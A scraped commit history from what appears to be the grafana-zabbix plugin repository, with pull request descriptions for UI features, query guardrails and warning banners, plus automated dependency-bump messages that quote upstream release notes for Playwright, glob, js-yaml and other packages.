only for package cspell ### [`v6.31.1`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6311-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.0...v6.31.1) **Note:** Version bump only for package cspell ### [`v6.31.0`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6310-2023-03-24) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.30.2...v6.31.0) **Note:** Version bump only for package cspell #### 6.30.2 (2023-03-18) ##### Bug Fixes - lock cosmiconfig to 8.0.0 ([#​4335](https://redirect.github.com/streetsidesoftware/cspell/issues/4335)) ([0f37e2c]( |
||
Jocelyn Collado-Kuri
|
9fda7768ff |
Add support to use custom values in dropdown (#2163)
## Summary
When we switched to use `Combobox` we were no longer able to add custom
values for our dropdowns, and this prevented users from using regexp
values for `group`, `host`, `proxy` etc. This PR adds
`createCustomValue` flag so that any custom value can be entered into
the dropdowns.
## Detailed summary
- Make use of `Combobox`'s `createCustomValues` so that wherever
necessary, users are able to enter regex values.
<img width="720" height="221" alt="Screenshot 2026-01-05 at 7 15 23 AM"
src="https://github.com/user-attachments/assets/841716eb-cd86-49d1-b13c-a0e37e8a37b9"
/>
## Why
For users to be able to use regexp, and any custom value in our
dropdowns.
## How to test
For all query types where dropdowns are used and user configurable (i.e.
group, host, proxy, application) start typing a value that does not
already exist in the dropdown. You should see an option to `Use custom
value`
Fixes
[comment](https://github.com/grafana/grafana-zabbix/pull/2141#issuecomment-3698818476),
thanks for the testing and call out @christos-diamantis
|
||
|
Jocelyn Collado-Kuri
|
0d64736e86 |
Adds support for host tags (#2140)
## Sumary When dealing with multiple hosts, it can be hard for customers filter through and figure out which host to query metric data from. This PR aims to make this easier by adding support for host tags so that there is another layer of filtering / grouping applied for hosts. ## Detailed explanation - Adds new UI components to allow adding one or more host tag filter, and a switch to choose between `AND/OR` and `OR` operators when using more than one filter following Zabbix's UI: https://github.com/user-attachments/assets/c971f5eb-7e93-4238-bd6b-902cc657c014 https://github.com/user-attachments/assets/5f8996de-684e-4ffa-b98e-8e205c4fc1df - Modifies the existing `getHosts` function to make a call to the backend with a few additional parameters to `extend` (essentially extract) the host tags for a given selected group. No backend changes were required for this. ## Why To make it easier for customers to query metric data when dealing with multiple hosts. ## How to test - Go to explore or a dashboard and create a Zabbix query where the query type is `Metrics` - The easiest way to test is by selecting `/.*/` for Groups, checking the returned `Hosts` they should all be there - Add a host tag filter and change the keys and operators as well as switching from `AND/OR` to `OR` you should see how the values returned for `Host` changes ## Future work Adding variable support for host tags once this is completed. Fixes: https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3609900134&issue=grafana%7Coss-big-tent-squad%7C126 and https://github.com/grafana/grafana-zabbix/issues/927 --------- Co-authored-by: ismail simsek <ismailsimsek09@gmail.com> |
||
|
Jocelyn Collado-Kuri
|
3d0895c008 |
Fix the way we merge frontend and backend queries (#2158)
## Summary With the new logic to merge backend and frontend query responses, some of the frontend query responses were being lost due to early termination. Merging frontend and backend responses was not properly waiting for all promises to resolve before returning this "merged" result ## Detailed explanation In `mergeQueries` although `Promise.all` was triggered, we returned immediately without waiting for the promises to actually resolve, now instead of passing down promises: - use `switchMap` so that the upstream backend response observable can be used as an inner Observable value to be concatenated with the rest of the responses - Why not use `map`? To prevent out of sync results, we need to wait for the promises to resolve **before** we pass it down to the `mergeQueries` function, `map` does not allow that. - use `from` and trigger `Promise.all` **before** calling `mergeQueries` so that all promise results can be resolved and converted to observables by the time they get passed into the function - modify `mergeQueries` to accept `DataResponse` for arguments, clone the existing data and return the merged result. <img width="1700" height="398" alt="Screenshot 2025-12-29 at 1 06 05 PM" src="https://github.com/user-attachments/assets/c07c59b1-43b8-47f9-adc6-67583b125856" /> ## Why To fix how frontend and backend queries are merged so that no response gets lost in the process ## How to test 1. Create a new dashboard or go to Explore 2. For query type select `Problems` or anything that is not `Metrics` 3. Execute the query, and you should be able to see a response. |
||
|
renovate-sh-app[bot]
|
4eb55efa59 |
chore(deps): update dependency @playwright/test to ^1.55.0 (#2156)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@playwright/test](https://playwright.dev) ([source](https://redirect.github.com/microsoft/playwright)) | [`^1.52.0` → `^1.55.0`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.55.0/1.57.0) |  |  | --- ### Release Notes <details> <summary>microsoft/playwright (@​playwright/test)</summary> ### [`v1.57.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.57.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.1...v1.57.0) #### Speedboard In HTML reporter, there's a new tab we call "Speedboard": <img width="600" alt="speedboard" src="https://github.com/user-attachments/assets/4ba117ea-ea94-4b6a-82b2-8bbd00dfe81c" /> It shows you all your executed tests sorted by slowness, and can help you understand where your test suite is taking longer than expected. Take a look at yours - maybe you'll find some tests that are spending a longer time waiting than they should! #### Chrome for Testing Starting with this release, Playwright switches from Chromium, to using [Chrome for Testing](https://developer.chrome.com/blog/chrome-for-testing/) builds. Both headed and headless browsers are subject to this. Your tests should still be passing after upgrading to Playwright 1.57. We're expecting no functional changes to come from this switch. The biggest change is the new icon and title in your toolbar. <img width="500" alt="new and old logo" src="https://github.com/user-attachments/assets/e9a5c4f2-9f35-4c27-9382-0f5eda377097" /> If you still see an unexpected behaviour change, please [file an issue](https://redirect.github.com/microsoft/playwright/issues/new). On Arm64 Linux, Playwright continues to use Chromium. #### Waiting for webserver output [testConfig.webServer](https://playwright.dev/docs/api/class-testconfig#test-config-web-server) added a `wait` field. Pass a regular expression, and Playwright will wait until the webserver logs match it. ```js import { defineConfig } from '@​playwright/test'; export default defineConfig({ webServer: { command: 'npm run start', wait: { stdout: '/Listening on port (?<my_server_port>\\d+)/' }, }, }); ``` If you include a named capture group into the expression, then Playwright will provide the capture group contents via environment variables: ```js import { test, expect } from '@​playwright/test'; test.use({ baseUrl: `http://localhost:${process.env.MY_SERVER_PORT ?? 3000}` }); test('homepage', async ({ page }) => { await page.goto('/'); }); ``` This is not just useful for capturing varying ports of dev servers. You can also use it to wait for readiness of a service that doesn't expose an HTTP readiness check, but instead prints a readiness message to stdout or stderr. #### Breaking Change After 3 years of being deprecated, we removed `Page#accessibility` from our API. Please use other libraries such as [Axe](https://www.deque.com/axe/) if you need to test page accessibility. See our Node.js [guide](https://playwright.dev/docs/accessibility-testing) for integration with Axe. #### New APIs - New property [testConfig.tag](https://playwright.dev/docs/api/class-testconfig#test-config-tag) adds a tag to all tests in this run. This is useful when using [merge-reports](https://playwright.dev/docs/test-sharding#merging-reports-from-multiple-shards). - [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console) event is emitted when JavaScript within the worker calls one of console API methods, e.g. console.log or console.dir. [worker.waitForEvent()](https://playwright.dev/docs/api/class-worker#worker-wait-for-event) can be used to wait for it. - [locator.description()](https://playwright.dev/docs/api/class-locator#locator-description) returns locator description previously set with [locator.describe()](https://playwright.dev/docs/api/class-locator#locator-describe), and `Locator.toString()` now uses the description when available. - New option [`steps`](https://playwright.dev/docs/api/class-locator#locator-click-option-steps) in [locator.click()](https://playwright.dev/docs/api/class-locator#locator-click) and [locator.dragTo()](https://playwright.dev/docs/api/class-locator#locator-drag-to) that configures the number of `mousemove` events emitted while moving the mouse pointer to the target element. - Network requests issued by [Service Workers](https://playwright.dev/docs/service-workers#network-events-and-routing) are now reported and can be routed through the [BrowserContext](https://playwright.dev/docs/api/class-browsercontext), only in Chromium. You can opt out using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_NETWORK` environment variable. - Console messages from Service Workers are dispatched through [worker.on('console')](https://playwright.dev/docs/api/class-worker#worker-event-console). You can opt out of this using the `PLAYWRIGHT_DISABLE_SERVICE_WORKER_CONSOLE` environment variable. #### Browser Versions - Chromium 143.0.7499.4 - Mozilla Firefox 144.0.2 - WebKit 26.0 ### [`v1.56.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.56.0...v1.56.1) #### Highlights [#​37871](https://redirect.github.com/microsoft/playwright/issues/37871) chore: allow local-network-access permission in chromium [#​37891](https://redirect.github.com/microsoft/playwright/issues/37891) fix(agents): remove workspaceFolder ref from vscode mcp [#​37759](https://redirect.github.com/microsoft/playwright/issues/37759) chore: rename agents to test agents [#​37757](https://redirect.github.com/microsoft/playwright/issues/37757) chore(mcp): fallback to cwd when resolving test config #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.56.0`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.56.0) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.1...v1.56.0) #### Playwright Agents Introducing Playwright Agents, three custom agent definitions designed to guide LLMs through the core process of building a Playwright test: - **🎭 planner** explores the app and produces a Markdown test plan - **🎭 generator** transforms the Markdown plan into the Playwright Test files - **🎭 healer** executes the test suite and automatically repairs failing tests Run `npx playwright init-agents` with your client of choice to generate the latest agent definitions: ```bash # Generate agent files for each agentic loop # Visual Studio Code npx playwright init-agents --loop=vscode # Claude Code npx playwright init-agents --loop=claude # opencode npx playwright init-agents --loop=opencode ``` > \[!NOTE] > VS Code v1.105 (currently on the VS Code Insiders channel) is needed for the agentic experience in VS Code. It will become stable shortly, we are a bit ahead of times with this functionality! [Learn more about Playwright Agents](https://playwright.dev/docs/test-agents) #### New APIs - New methods [page.consoleMessages()](https://playwright.dev/docs/api/class-page#page-console-messages) and [page.pageErrors()](https://playwright.dev/docs/api/class-page#page-page-errors) for retrieving the most recent console messages from the page - New method [page.requests()](https://playwright.dev/docs/api/class-page#page-requests) for retrieving the most recent network requests from the page - Added [`--test-list` and `--test-list-invert`](https://playwright.dev/docs/test-cli#test-list) to allow manual specification of specific tests from a file #### UI Mode and HTML Reporter - Added option to `'html'` reporter to disable the "Copy prompt" button - Added option to `'html'` reporter and UI Mode to merge files, collapsing test and describe blocks into a single unified list - Added option to UI Mode mirroring the `--update-snapshots` options - Added option to UI Mode to run only a single worker at a time #### Breaking Changes - Event [browserContext.on('backgroundpage')](https://playwright.dev/docs/api/class-browsercontext#browser-context-event-background-page) has been deprecated and will not be emitted. Method [browserContext.backgroundPages()](https://playwright.dev/docs/api/class-browsercontext#browser-context-background-pages) will return an empty list #### Miscellaneous - Aria snapshots render and compare `input` `placeholder` - Added environment variable `PLAYWRIGHT_TEST` to Playwright worker processes to allow discriminating on testing status #### Browser Versions - Chromium 141.0.7390.37 - Mozilla Firefox 142.0.1 - WebKit 26.0 ### [`v1.55.1`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.55.1) [Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.55.0...v1.55.1) ##### Highlights [#​37479](https://redirect.github.com/microsoft/playwright/issues/37479) - \[Bug]: Upgrade Chromium to 140.0.7339.186. [#​37147](https://redirect.github.com/microsoft/playwright/issues/37147) - \[Regression]: Internal error: step id not found. [#​37146](https://redirect.github.com/microsoft/playwright/issues/37146) - \[Regression]: HTML reporter displays a broken chip link when there are no projects. [#​37137](https://redirect.github.com/microsoft/playwright/pull/37137) - Revert "fix(a11y): track inert elements as hidden". [#​37532](https://redirect.github.com/microsoft/playwright/pull/37532) - chore: do not use -k option #### Browser Versions - Chromium 140.0.7339.186 - Mozilla Firefox 141.0 - WebKit 26.0 This version was also tested against the following stable channels: - Google Chrome 139 - Microsoft Edge 139 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [x] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Sriram <153843+yesoreyeram@users.noreply.github.com> |
||
dependabot[bot]
|
0232194405 |
Bump qs from 6.14.0 to 6.14.1 (#2161)
Bumps [qs](https://github.com/ljharb/qs) from 6.14.0 to 6.14.1. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/ljharb/qs/blob/main/CHANGELOG.md">qs's changelog</a>.</em></p> <blockquote> <h2><strong>6.14.1</strong></h2> <ul> <li>[Fix] ensure arrayLength applies to <code>[]</code> notation as well</li> <li>[Fix] <code>parse</code>: when a custom decoder returns <code>null</code> for a key, ignore that key</li> <li>[Refactor] <code>parse</code>: extract key segment splitting helper</li> <li>[meta] add threat model</li> <li>[actions] add workflow permissions</li> <li>[Tests] <code>stringify</code>: increase coverage</li> <li>[Dev Deps] update <code>eslint</code>, <code>@ljharb/eslint-config</code>, <code>npmignore</code>, <code>es-value-fixtures</code>, <code>for-each</code>, <code>object-inspect</code></li> </ul> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
f3c5a15a20 |
chore(deps): update dependency @grafana/plugin-e2e to ^2.2.3 (#2155)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@grafana/plugin-e2e](https://redirect.github.com/grafana/plugin-tools) ([source](https://redirect.github.com/grafana/plugin-tools/tree/HEAD/packages/plugin-e2e)) | [`^2.1.12` → `^2.2.3`](https://renovatebot.com/diffs/npm/@grafana%2fplugin-e2e/2.1.12/2.2.3) |  |  | --- ### Release Notes <details> <summary>grafana/plugin-tools (@​grafana/plugin-e2e)</summary> ### [`v2.2.3`](https://redirect.github.com/grafana/plugin-tools/releases/tag/%40grafana/plugin-e2e%402.2.3) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.2...@grafana/plugin-e2e@2.2.3) ##### 🐛 Bug Fix - CreatePlugin: Adding step about health check functionality in ds tutorial. [#​2222](https://redirect.github.com/grafana/plugin-tools/pull/2222) ([@​mckn](https://redirect.github.com/mckn)) ##### Authors: 1 - Marcus Andersson ([@​mckn](https://redirect.github.com/mckn)) ### [`v2.2.2`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.1...@grafana/plugin-e2e@2.2.2) ### [`v2.2.1`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v221-Thu-Oct-09-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.2.0...@grafana/plugin-e2e@2.2.1) ##### 🐛 Bug Fix - E2E: fix for flakiness in PanelEditPage.refreshPanel [#​2207](https://redirect.github.com/grafana/plugin-tools/pull/2207) ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) ##### Authors: 1 - Hugo Häggmark ([@​hugohaggmark](https://redirect.github.com/hugohaggmark)) *** ### [`v2.2.0`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v220-Tue-Oct-07-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.14...@grafana/plugin-e2e@2.2.0) ##### 🚀 Enhancement - Plugin E2E: Add support for specifying user preferences [#​2131](https://redirect.github.com/grafana/plugin-tools/pull/2131) ([@​sunker](https://redirect.github.com/sunker)) ##### Authors: 1 - Erik Sundell ([@​sunker](https://redirect.github.com/sunker)) *** ### [`v2.1.14`](https://redirect.github.com/grafana/plugin-tools/blob/HEAD/packages/plugin-e2e/CHANGELOG.md#v2114-Mon-Sep-29-2025) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.13...@grafana/plugin-e2e@2.1.14) ##### 🐛 Bug Fix - Update dependency uuid to v13 [#​2139](https://redirect.github.com/grafana/plugin-tools/pull/2139) ([@​renovate\[bot\]](https://redirect.github.com/renovate\[bot])) ##### Authors: 1 - [@​renovate\[bot\]](https://redirect.github.com/renovate\[bot]) *** ### [`v2.1.13`](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) [Compare Source](https://redirect.github.com/grafana/plugin-tools/compare/@grafana/plugin-e2e@2.1.12...@grafana/plugin-e2e@2.1.13) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
ismail simsek
|
ef9557f60e |
Add time range warning in query editor for large time ranges (#2150)
## Summary Adds a non-intrusive warning banner in the query editor that alerts users when the selected time range exceeds 1 year (365 days). This helps users understand that their query may return a large amount of data and could take longer to execute, without blocking or interrupting their workflow. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes - Added `TIME_RANGE_WARNING_THRESHOLD_DAYS` constant (365 days) in `src/datasource/constants.ts` - Created new `TimeRangeWarning` component in `src/datasource/components/TimeRangeWarning.tsx` - Integrated the warning component into the main `QueryEditor` component ## How it works - When the dashboard time range is >= 365 days, a warning banner appears at the top of the query editor - The warning displays the formatted duration (e.g., "1 year and 30 days") - The warning is purely informational - queries still execute normally - Uses Grafana theme colors for consistent styling in both light and dark modes ## Screenshot The warning appears as a subtle banner with a warning icon: <img width="705" height="374" alt="grafik" src="https://github.com/user-attachments/assets/eb0ace4b-524a-488e-8f88-b7e9523660b0" /> ## Why Queries spanning years of data can return millions of data points and potentially overload the Zabbix server. This proactive warning helps users make informed decisions about their query scope without adding friction to the normal query flow. |
||
|
dependabot[bot]
|
3d631aedd7 |
Bump glob from 10.4.5 to 11.1.0 (#2153)
Bumps [glob](https://github.com/isaacs/node-glob) from 10.4.5 to 11.1.0. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/isaacs/node-glob/blob/main/changelog.md">glob's changelog</a>.</em></p> <blockquote> <h1>changeglob</h1> <h2>13</h2> <ul> <li>Move the CLI program out to a separate package, <code>glob-bin</code>. Install that if you'd like to continue using glob from the command line.</li> </ul> <h2>12</h2> <ul> <li>Remove the unsafe <code>--shell</code> option. The <code>--shell</code> option is now ONLY supported on known shells where the behavior can be implemented safely.</li> </ul> <h2>11.1</h2> <p><a href="https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2">GHSA-5j98-mcp5-4vw2</a></p> <ul> <li>Add the <code>--shell</code> option for the command line, with a warning that this is unsafe. (It will be removed in v12.)</li> <li>Add the <code>--cmd-arg</code>/<code>-g</code> as a way to <em>safely</em> add positional arguments to the command provided to the CLI tool.</li> <li>Detect commands with space or quote characters on known shells, and pass positional arguments to them safely, avoiding <code>shell:true</code> execution.</li> </ul> <h2>11.0</h2> <ul> <li>Drop support for node before v20</li> </ul> <h2>10.4</h2> <ul> <li>Add <code>includeChildMatches: false</code> option</li> <li>Export the <code>Ignore</code> class</li> </ul> <h2>10.3</h2> <ul> <li>Add <code>--default -p</code> flag to provide a default pattern</li> <li>exclude symbolic links to directories when <code>follow</code> and <code>nodir</code> are both set</li> </ul> <h2>10.2</h2> <ul> <li>Add glob cli</li> </ul> <h2>10.1</h2> <ul> <li>Return <code>'.'</code> instead of the empty string <code>''</code> when the current working directory is returned as a match.</li> <li>Add <code>posix: true</code> option to return <code>/</code> delimited paths, even on</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
ismail simsek
|
04fca562b0 |
feat(backend): Add query guardrails to prevent potential issues (#2149)
## Summary Implements query guardrails in the backend to prevent execution of expensive or malformed queries that could impact customer environments. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes ### New guardrails added: 1. **Item ID validation** (`queryItemIdData`) - Validates that item IDs are non-empty - Validates that item IDs contain only numeric values 2. **Time range validation** (`QueryData`) - Validates that `From` timestamp is before `To` timestamp 3. **API method allowlist** (`ZabbixAPIHandler`) - Only allows Zabbix API methods defined in the frontend type `zabbixMethodName` - Blocks any write/delete/update operations not in the allowlist ### New files: - `pkg/datasource/guardrails.go` - Validation functions and error definitions - `pkg/datasource/guardrails_test.go` - Unit tests for all validation functions ### Modified files: - `pkg/datasource/datasource.go` - Added time range validation - `pkg/datasource/zabbix.go` - Added item ID validation - `pkg/datasource/resource_handler.go` - Added API method validation ## Reasoning - Allowed functions might be unnecessary as we've already prevent using those in [types.ts](https://github.com/grafana/grafana-zabbix/blob/main/src/datasource/zabbix/types.ts#L1-L23) but it's nice to be cautious. - itemid and time validation is just for sanity. - Time range validation will be necessary in the future to warn user agains running expensive queries. |
||
|
ismail simsek
|
3e626d3aa5 |
Add item count warning in query editor for large result sets (#2152)
## Summary Adds a non-intrusive warning banner in the query editor that alerts users when their query matches a large number of items (>= 500). This helps users understand that their query may return a large amount of data and suggests using more specific filters. Part of https://github.com/grafana/oss-big-tent-squad/issues/127 ## Changes - Added `ITEM_COUNT_WARNING_THRESHOLD` constant (500 items) in `src/datasource/constants.ts` - Created new `ItemCountWarning` component in `src/datasource/components/ItemCountWarning.tsx` - Updated `MetricsQueryEditor` to track and report the count of items matching the current filter - Integrated the warning component into the main `QueryEditor` component ## How it works - When items are loaded for the dropdown in the Metrics query editor, the component counts how many items match the current item filter - If using a regex filter like `/.*/`, it applies the regex to count matching items - If the count is >= 500, a warning banner appears at the top of the query editor - The warning is purely informational - queries still execute normally - The warning only appears for the "Metrics" query type ## Screenshot The warning appears as a subtle banner with a warning icon: > I set the limit as 5 just to show the warning <img width="901" height="298" alt="grafik" src="https://github.com/user-attachments/assets/a9be8563-1b90-4581-ad15-4e7035b4166e" /> ## Why Queries that match thousands of items via wildcard filters (e.g., `/.*/`) can return massive amounts of data and potentially overload the Zabbix server. This proactive warning helps users make informed decisions about their query scope without adding friction to the normal query flow. |
||
|
renovate-sh-app[bot]
|
4eece4b75e |
chore(deps): update dependency terser-webpack-plugin to ^5.3.14 (#2154)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [terser-webpack-plugin](https://redirect.github.com/webpack/terser-webpack-plugin) | [`^5.3.10` → `^5.3.14`](https://renovatebot.com/diffs/npm/terser-webpack-plugin/5.3.14/5.3.16) |  |  | --- ### Release Notes <details> <summary>webpack/terser-webpack-plugin (terser-webpack-plugin)</summary> ### [`v5.3.16`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5316-2025-12-11) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.15...v5.3.16) ### [`v5.3.15`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5315-2025-12-05) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.14...v5.3.15) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
02a323b142 |
chore(deps): update dependency semver to ^7.7.2 (#2147)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [semver](https://redirect.github.com/npm/node-semver) | [`^7.6.3` → `^7.7.2`](https://renovatebot.com/diffs/npm/semver/7.7.2/7.7.3) |  |  | --- ### Release Notes <details> <summary>npm/node-semver (semver)</summary> ### [`v7.7.3`](https://redirect.github.com/npm/node-semver/blob/HEAD/CHANGELOG.md#773-2025-10-06) [Compare Source](https://redirect.github.com/npm/node-semver/compare/v7.7.2...v7.7.3) ##### Bug Fixes - [`e37e0ca`]( |
||
|
dependabot[bot]
|
0c1f1203ea |
Bump js-yaml from 3.14.1 to 3.14.2 (#2148)
Bumps [js-yaml](https://github.com/nodeca/js-yaml) from 3.14.1 to 3.14.2. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md">js-yaml's changelog</a>.</em></p> <blockquote> <h2>[3.14.2] - 2025-11-15</h2> <h3>Security</h3> <ul> <li>Backported v4.1.1 fix to v3</li> </ul> <h2>[4.1.1] - 2025-11-12</h2> <h3>Security</h3> <ul> <li>Fix prototype pollution issue in yaml merge (<<) operator.</li> </ul> <h2>[4.1.0] - 2021-04-15</h2> <h3>Added</h3> <ul> <li>Types are now exported as <code>yaml.types.XXX</code>.</li> <li>Every type now has <code>options</code> property with original arguments kept as they were (see <code>yaml.types.int.options</code> as an example).</li> </ul> <h3>Changed</h3> <ul> <li><code>Schema.extend()</code> now keeps old type order in case of conflicts (e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as <code>abcd</code> instead of <code>cbad</code>).</li> </ul> <h2>[4.0.0] - 2021-01-03</h2> <h3>Changed</h3> <ul> <li>Check <a href="https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md">migration guide</a> to see details for all breaking changes.</li> <li>Breaking: "unsafe" tags <code>!!js/function</code>, <code>!!js/regexp</code>, <code>!!js/undefined</code> are moved to <a href="https://github.com/nodeca/js-yaml-js-types">js-yaml-js-types</a> package.</li> <li>Breaking: removed <code>safe*</code> functions. Use <code>load</code>, <code>loadAll</code>, <code>dump</code> instead which are all now safe by default.</li> <li><code>yaml.DEFAULT_SAFE_SCHEMA</code> and <code>yaml.DEFAULT_FULL_SCHEMA</code> are removed, use <code>yaml.DEFAULT_SCHEMA</code> instead.</li> <li><code>yaml.Schema.create(schema, tags)</code> is removed, use <code>schema.extend(tags)</code> instead.</li> <li><code>!!binary</code> now always mapped to <code>Uint8Array</code> on load.</li> <li>Reduced nesting of <code>/lib</code> folder.</li> <li>Parse numbers according to YAML 1.2 instead of YAML 1.1 (<code>01234</code> is now decimal, <code>0o1234</code> is octal, <code>1:23</code> is parsed as string instead of base60).</li> <li><code>dump()</code> no longer quotes <code>:</code>, <code>[</code>, <code>]</code>, <code>(</code>, <code>)</code> except when necessary, <a href="https://redirect.github.com/nodeca/js-yaml/issues/470">#470</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/557">#557</a>.</li> <li>Line and column in exceptions are now formatted as <code>(X:Y)</code> instead of <code>at line X, column Y</code> (also present in compact format), <a href="https://redirect.github.com/nodeca/js-yaml/issues/332">#332</a>.</li> <li>Code snippet created in exceptions now contains multiple lines with line numbers.</li> <li><code>dump()</code> now serializes <code>undefined</code> as <code>null</code> in collections and removes keys with <code>undefined</code> in mappings, <a href="https://redirect.github.com/nodeca/js-yaml/issues/571">#571</a>.</li> <li><code>dump()</code> with <code>skipInvalid=true</code> now serializes invalid items in collections as null.</li> <li>Custom tags starting with <code>!</code> are now dumped as <code>!tag</code> instead of <code>!<!tag></code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/576">#576</a>.</li> <li>Custom tags starting with <code>tag:yaml.org,2002:</code> are now shorthanded using <code>!!</code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/258">#258</a>.</li> </ul> <h3>Added</h3> <ul> <li>Added <code>.mjs</code> (es modules) support.</li> <li>Added <code>quotingType</code> and <code>forceQuotes</code> options for dumper to configure string literal style, <a 